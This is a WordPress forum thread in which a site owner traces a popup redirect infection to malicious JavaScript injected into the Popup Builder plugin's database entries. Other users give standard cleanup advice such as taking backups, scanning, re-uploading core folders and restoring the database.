WordPress compromised – popup malware attack

  • jojojijijojo

    (@jojojijijojo)


    6 years, 2 months ago

    Hi,
    So my wordpress website is compromised, when going to the main url, a popup window shows up and it redirects users to ads and malign websites.

    Debugging my website homepage I found the following script called:

    Request URL: https://***/up/display.js
    :path: /up/display.js

    Which calls:
    Request URL: https://cdn.***.***/link-converter.min.js

    Which calls:
    Request URL: https://***.com/pu-placer.js?t=1514302a73

    I check my files timestamp and none of them was modified, which makes me believe that the malware is actually injected into the database.

    I disabled all plugins and the malware redirect seems to stop, does that confirm that the malware resides in the DB alone? seeing that none of the hosted files were modified?

    • This topic was modified 6 years, 2 months ago by jojojijijojo.
Viewing 4 replies - 1 through 4 (of 4 total)
  • Smat Placid

    (@www_smatplacid_com)

    6 years, 2 months ago

    FIRST step should be: having a backup! I you don’t have any yet, try to install e.g. “UpDraft” in free version and make a backup.

    Usually root-files will be compromised first.
    Check ‘wp-config.php’, ‘wp-settings.php’, ‘index.php’ (and so on) and look for suspicous @include commands.

    You can start with a IMO very good tool ‘Anti-Malware Security and Brute-Force Firewall’ <https://ww.wp.xz.cn/plugins/gotmls/&gt;.
    Its scanning all files in your WordPress-install.

    What helps is to delete DIR “wp-admin” and “wp-includes” and re-upp theese DIRs from a zip – just to make sure this two folders are clean.

    Thread Starter jojojijijojo

    (@jojojijijojo)

    6 years, 2 months ago

    Thanks Smat,

    I found the culprit plugin, it was “Popup Builder – Responsive WordPress Pop up”
    When searching the database for “String.fromCharCode”, I found two results (sg_popup_scripts and sg_popup_options_preview) that included the malicious injected JS code, deleting it seems to solve this, but this could have been much much worse…

    I’m still going to re-upload critical folders like you mentioned just in case.

    codersaurus

    (@codersaurus)

    6 years, 2 months ago

    Also try to upload the last stable db dump. Additional mods could have been made to the db. Better safe than sorry.

    All the best!

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    6 years, 2 months ago

    Trust nothing once your site has been compromised.

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘WordPress compromised – popup malware attack’ is closed to new replies.